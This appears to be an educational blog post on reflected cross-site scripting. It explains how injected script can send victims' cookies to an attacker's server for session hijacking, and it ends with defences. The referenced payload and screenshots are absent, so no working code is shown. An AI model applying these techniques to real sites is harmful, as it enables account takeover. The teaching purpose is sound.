What Is Cross Site Scripting (XSS)?

Cross Site Scripting (XSS) is a web attack that runs arbitrary JavaScript in the context of the user’s browsing session. So all cookies that are targeted with the XSS attack will be the cookie’s in the victim’s browser. Attackers using XSS against a victim can make the victim’s browser execute JavaScript code. For example, attackers can potentially use XSS to make a victim travel to a malicious domain, change their email address, or send their sensitive cookies (or other data) to a malicious web server for collection.

Our First Example Of XSS

Analyze the images below

If you look at the above small cut-out of the page source of the blog web page, our malicious <script></script> get’s injected into an header tag. The specific HTML is this:

This is called Reflected XSS into HTML Context. Our XSS payload is injected into the part of the HTML that reflects the user’s search query back to them on the page.

How Would An Attacker Send The XSS Payload To The Victim?

For context, this is what the victim user would see on their screen after traveling to the attacker’s malicious domain where the above html proof of concept is hosted:

Victim’s View

Attacker’s View

And this is what the attacker would see on their malicious server after the XSS payload is executed in the victim’s browser:

Obviously, no sensitive data was sent over with this XSS payload. However, if other misconfiguration was present on the target website, an attacker could have made the victim user send their session cookie to the attacker’s server. The attacker could then use the victim’s session cookies to conduct a Session Hijacking on the victim user’s account, which essentially means the attacker would be able to be logged in as the victim user.

Cross-Site Scripting (XSS) remains one of the most prevalent and dangerous vulnerabilities in modern web applications due to its ability to execute arbitrary JavaScript in the victim’s browser. As demonstrated, attackers can exploit poorly sanitized input to inject payloads that execute in the context of a user’s session, potentially exposing sensitive data such as cookies, session tokens, or personal information.

The technical impact of XSS goes beyond simple proof-of-concept alerts — it enables attackers to perform session hijacking, force unauthorized actions via CSRF, exfiltrate data, and even deploy more complex attacks such as browser-based keyloggers or malware delivery. This underscores the importance of robust input validation and output encoding practices, along with the implementation of Content Security Policy (CSP), HTTP-only cookies, and other defense-in-depth mechanisms.

By understanding the anatomy of XSS attacks and their potential consequences, security professionals and developers can take a proactive approach to detect, mitigate, and prevent this vulnerability, ensuring a safer web for users.

Thanks for reading, and if you learned something, THANK YOU FOR LEARNING!

Check out my other articles below, say Hi in the comments, and click that clap button for me please =)